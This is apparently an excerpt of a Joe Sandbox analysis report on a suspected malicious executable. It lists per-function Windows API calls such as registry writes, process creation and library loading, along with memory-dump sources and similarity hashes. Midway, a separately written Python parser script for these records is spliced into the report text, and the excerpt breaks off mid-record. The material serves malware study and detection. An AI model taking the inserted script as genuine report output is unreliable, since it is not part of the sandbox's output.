• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
• Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
• RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
• Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
• Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
• Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
• Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
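The per-function records above follow a regular text layout: an "APIs" list whose entries are either direct calls of the function or "Part of subcall function XXXX:" entries made inside a callee, followed by the memory-dump provenance and the Similarity fields (API ID, API String ID, Instruction Fuzzy Hash). The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses records in that layout into structured objects, keeps direct calls apart from subcall entries, and flags direct calls against a small hypothetical watchlist. The names parse_records, triage, ApiCall, FunctionRecord and WATCHLIST are the example's own; the embedded sample input is constructed from two records of this section (indentation and "Download File" link residue removed, the first subcall list shortened to three entries).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied from this report section, with indentation
# and "Download File" link text removed and the first subcall list cut to three entries.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
• RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseValuelstrlen
• API String ID: 2655323295-0
• Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the marker the report
# uses for calls made inside a callee rather than in this function.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Metadata bullets ("• API ID: ..."); the letters-only key never matches an API line.
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address for "Part of subcall function" entries

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    @property
    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

    @property
    def api_id(self) -> str:
        return self.meta.get("API ID", "")

def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each record ends at its Instruction Fuzzy Hash line."""
    records: List[FunctionRecord] = []
    current = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(
                name=m["name"], module=m["module"],
                args=[a.strip() for a in m["args"].split(",")] if m["args"] else [],
                ref=int(m["ref"], 16),
                subcall_of=int(m["subfn"], 16) if m["subfn"] else None))
            continue
        kv = KV_RE.match(line)
        if kv:
            key = kv["key"].strip()
            current.meta[key] = kv["val"].strip()
            if key == "Instruction Fuzzy Hash":   # last bullet of every record
                records.append(current)
                current = FunctionRecord()
    return records

# Hypothetical watchlist, for illustration only; the report's signatures are authoritative.
WATCHLIST = {"RegSetValueExW": "registry value write",
             "LoadLibraryExW": "runtime library load",
             "SetWindowTextW": "GUI text update"}

def triage(records: List[FunctionRecord]) -> List[tuple]:
    """(record index, API, call-site address, note) for every DIRECT watchlist hit.
    Subcall entries are skipped on purpose: they describe the callee, not this function."""
    return [(i, c.name, f"{c.ref:08X}", WATCHLIST[c.name])
            for i, rec in enumerate(records)
            for c in rec.direct_calls if c.name in WATCHLIST]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print([(r.api_id, [c.name for c in r.direct_calls]) for r in recs])
    print(triage(recs))
```

Run against the sample, the first record resolves to three direct calls (GetModuleHandleW, LoadLibraryExW, FreeLibrary) with all subcall entries attributed to 0x405569, and triage reports LoadLibraryExW at 00402114 and RegSetValueExW at 00402515 while ignoring SetWindowTextW, which only appears inside the callee. The Instruction Fuzzy Hash is carried through as an opaque string: the report does not document its algorithm, so the parser makes no similarity claims about it.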
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
• Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
• Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
• Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
APIs
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
• Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
• Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
• Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
• Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
• Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
• Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
APIs
• OleInitialize.OLE32(00000000), ref: 0040564C
  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
• CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
• Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
• Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
• Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
• Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401EFC
• EnableWindow.USER32(00000000,00000000), ref: 00401F07
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
• Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
• Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
• Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
• CloseHandle.KERNEL32(?), ref: 00405B20
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                              • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                              • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                              • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                                                                                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
